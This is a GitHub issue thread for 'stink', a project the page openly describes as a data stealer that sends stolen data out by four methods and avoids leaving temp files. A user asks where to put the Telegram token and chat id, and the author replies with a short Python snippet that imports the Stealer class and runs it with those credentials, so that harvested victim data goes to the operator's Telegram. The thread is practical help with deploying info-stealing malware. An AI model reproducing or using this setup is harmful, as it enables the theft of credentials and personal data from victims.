FallenAstaroth / stink

🚀 Stealer on built-in libraries only, which doesn't create any temp files on data collecting, with 4 sending methods and lots of functionality.
Apache License 2.0
224 stars 55 forks source link

I couldn't find where to enter my telegram token and chat id #19

Closed noblesssss closed 2 years ago

noblesssss commented 2 years ago

I couldn't find where to enter my telegram token and chat id

FallenAstaroth commented 2 years ago

You need to create a new file with the following code, there are also fields for token and id (In the second line):

https://github.com/FallenAstaroth/stink/blob/master/docs/en.md#standard

Example:

from stink.multistealer import Stealer

Stealer(token="ha3aJSD3245sdgSGDSsdg", user_id=123456789).run()